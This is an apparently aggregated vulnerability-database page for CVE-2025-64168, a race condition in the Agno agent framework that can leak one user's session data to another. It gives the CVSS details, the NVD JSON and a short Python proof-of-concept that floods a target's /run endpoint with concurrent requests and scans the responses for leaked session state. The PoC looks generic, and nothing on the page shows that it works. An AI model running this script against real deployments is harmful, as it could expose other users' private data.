Security Vulnerability Report
中文
CVE-2025-64168 CVSS 7.1 HIGH

CVE-2025-64168

Published: 2025-10-31 15:15:43
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Agno is a multi-agent framework, runtime and control plane. From 2.0.0 to before 2.2.2, under high concurrency, when session_state is passed to Agent or Team during run or arun calls, a race condition can occur, causing a session_state to be assigned and persisted to the incorrect session. This may result in user data from one session being exposed to another user. This has been patched in version 2.2.2.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Agno >= 2.0.0 且 < 2.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import asyncio import aiohttp from concurrent.futures import ThreadPoolExecutor # PoC for CVE-2025-64168: Race condition in Agno session_state handling # This demonstrates the race condition that can leak session data between users async def exploit_session_leak(target_url: str, session_id: str): """ Simulate concurrent requests that may trigger the race condition in Agno's session_state handling """ async with aiohttp.ClientSession() as session: payload = { 'session_id': session_id, 'session_state': { 'user_data': 'sensitive_information', 'tokens': ['token1', 'token2'] }, 'agent_config': { 'name': 'test_agent', 'model': 'gpt-4' } } # Send concurrent requests to trigger race condition tasks = [] for i in range(100): tasks.append(session.post(f'{target_url}/run', json=payload)) responses = await asyncio.gather(*tasks, return_exceptions=True) return responses def check_session_leak(responses): """ Check if any responses contain session data from other users """ leaked_data = [] for i, resp in enumerate(responses): if hasattr(resp, 'json'): try: data = resp.json() if 'session_state' in data and data['session_state']: leaked_data.append({ 'response_index': i, 'leaked_session': data['session_state'] }) except: pass return leaked_data # Usage # asyncio.run(exploit_session_leak('http://target:port', 'victim_session_id'))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64168", "sourceIdentifier": "[email protected]", "published": "2025-10-31T15:15:43.377", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Agno is a multi-agent framework, runtime and control plane. From 2.0.0 to before 2.2.2, under high concurrency, when session_state is passed to Agent or Team during run or arun calls, a race condition can occur, causing a session_state to be assigned and persisted to the incorrect session. This may result in user data from one session being exposed to another user. This has been patched in version 2.2.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}, {"lang": "en", "value": "CWE-668"}]}], "references": [{"url": "https://github.com/agno-agi/agno/security/advisories/GHSA-vw84-hprm-cxmm", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.